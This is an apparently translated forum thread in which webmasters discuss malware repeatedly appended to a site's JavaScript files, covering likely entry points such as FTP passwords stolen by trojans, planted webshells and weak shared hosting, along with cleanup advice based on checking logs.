The passwords were changed, but they didn't forget to tell themselves about them...
There are only three options:
1) A hole in php scripts (or in access rights) that allows you to write something to the server. (unlikely)
2) A hole in the hosting that allows you to write something to neighbors (average likely)
3) Someone with admin access to the site has a hole (for sure)
And finding out what exactly the hole is is the task of the resource administrator.

Faced with a similar case. I found an exploit in /var/tmp, a regular script that, through a vulnerability in the OS, got root access and changed all js files that it found in docroot. If the virus reappears after changing passwords, then either you have an exploit on your hosting, or on a computer through which you work with the hosting file structure.

We had the same garbage on our test domain yesterday.
Judging by the logs, in FTP, all js files just added a virus to the end. Because only the password of a user with access to 1 domain was compromised, only there it happened ... Only that user had the password, so everything is pretty obvious)

It is very similar to a virus that walks through FTP and hangs its tails at the end of certain files. Just changing passwords is not enough, you need to catch it first. This vir only in my memory bypassed Avast, Komodo, Norton and Nod32. Try to install Casper's probe - it helped my friend recently. When you catch it, then change passwords and clean the site itself. In general, it is not recommended to store passwords saved in FTP programs. Total Commander and Filezilla are especially susceptible.

The most popular
1 passwords leaked from FTP Total Far, etc.
2 uploaded a shell or a malicious virus to a neighboring site, and the webserver is not configured to isolate projects
3 uploaded a popular CMS to the second site by guessing a password in the admin panel.
4 something is not being checked on your site and you can include external code or downloaded a malicious script to you

In 99 percent of cases, the ftp password is stolen by a trojan on the computer of a developer, admin, or just a person who has access to the site, first of all, look at the ftp logs.
another one percent is holes in old engines
very rarely targeted hacking
recently met on godaddy shared hosting with a broken server, blocking all access on the site still registers a virus, the hoster firmly refuses to give ftp logs, according to Apache logs there is no hacking through the admin panel, wordpress engine the last one, all passwords have been changed, all files have been re-uploaded from a clean copy. Conclusion broken hoster.

what do the logs say? access log?

Recently, at the request of colleagues, I analyzed a similar situation. During the first hack (leaked FTP password), in addition to editing scripts, a webshell was added to the bowels of the CMS, through which they later broke it again. It is noteworthy that the webshell was added the day before the scripts were edited and from another IP.

Don't you think that the first and second time the virus could get in different ways? The first hit is most likely a password stolen from the FTP client.
There was a connection through it. And after that, no resource was put into a php shell for further work. Most likely, your js-files were “fixed” from the already given shell.
Have you changed passwords, cleaned up js, and have you looked at the changes in PHP?
Now you need not only to cure computers (most likely a virus is sitting there), but also to dig your own site for the “improvements” introduced there ...

1) They stole the password from FTP saved in the total commander or similar
software 2) There is a vulnerability in the scripts and a virus is inserted through it